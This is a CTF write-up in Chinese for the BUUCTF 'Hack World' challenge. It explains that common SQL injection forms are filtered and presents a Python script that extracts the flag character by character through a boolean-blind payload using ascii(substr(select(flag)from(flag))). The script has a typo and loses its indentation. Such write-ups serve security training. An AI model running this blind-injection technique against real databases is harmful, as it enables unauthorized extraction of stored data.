BUUCTF [CISCN2019 华北赛区 Day2 Web1] Hack World

1、通过题目,可以知道该题目为SQL注入类型:

2、判断注入类型为数字注入:

3、通过BP抓包,来判断注入点。

字典爆破发现常规的注入方式都被过滤。

4、因此可以尝试通过布尔盲注的方式来得到flag。编写脚本得到flag

import requests

url = "http://977ba0f7-8772-4617-9600-8089c3d7e1e3.node5.buuoj.cn:81/index.php"

result = ""

for i in range(1, 50):

for j in range(32, 128):

payload = "(ascii(substr((select(flag)from(flag)),{m},1))>{n})"

response = requests.post(url=url, data={'id': payload.format(m=i, n=j)})

{m} 是当前正在提取的 flag 字符位置,{n} 是 ASCII 码值,用于比较。

f response.text.find('girl') == -1:

result += chr(j)

print(j)

break

print("正在输出flag:", result)

print("flag:", result)

#外层循环 (for i in range(1, 50)):循环遍历 flag 的每个字符位置,假设 flag 最长为 50 个字符。

#内层循环 (for j in range(32, 128)):循环遍历 ASCII 字符集中的可打印字符(从空格到 '~')。

#payload 变量:构造了一个 SQL 注入 payload,使用 substr() 函数逐个提取 flag 的字符,并通过 ascii() 函数转换为 ASCII 码值,然后与 j 比较。

5、得到flag:

相关推荐
nanzhuhe1 小时前
sql中group by使用场景
数据库·sql·数据挖掘
消失在人海中2 小时前
oracle sql 语句 优化方法
数据库·sql·oracle
搬码临时工2 小时前
如何把本地服务器变成公网服务器?内网ip网址转换到外网连接访问
运维·服务器·网络·tcp/ip·智能路由器·远程工作·访问公司内网
zzc9212 小时前
MATLAB仿真生成无线通信网络拓扑推理数据集
开发语言·网络·数据库·人工智能·python·深度学习·matlab
Guheyunyi2 小时前
监测预警系统重塑隧道安全新范式
大数据·运维·人工智能·科技·安全
程序员岳焱3 小时前
Java 与 MySQL 性能优化:MySQL 慢 SQL 诊断与分析方法详解
后端·sql·mysql
IT科技那点事儿3 小时前
引领AI安全新时代 Accelerate 2025北亚巡展·北京站成功举办
人工智能·安全
UGOTNOSHOT4 小时前
每日八股文6.3
数据库·sql
朱包林5 小时前
day27-shell编程(自动化)
linux·运维·服务器·网络·shell脚本
SZ1701102316 小时前
IP协议 标识字段 同一个源IP、目的IP和协议号内唯一
网络·网络协议·tcp/ip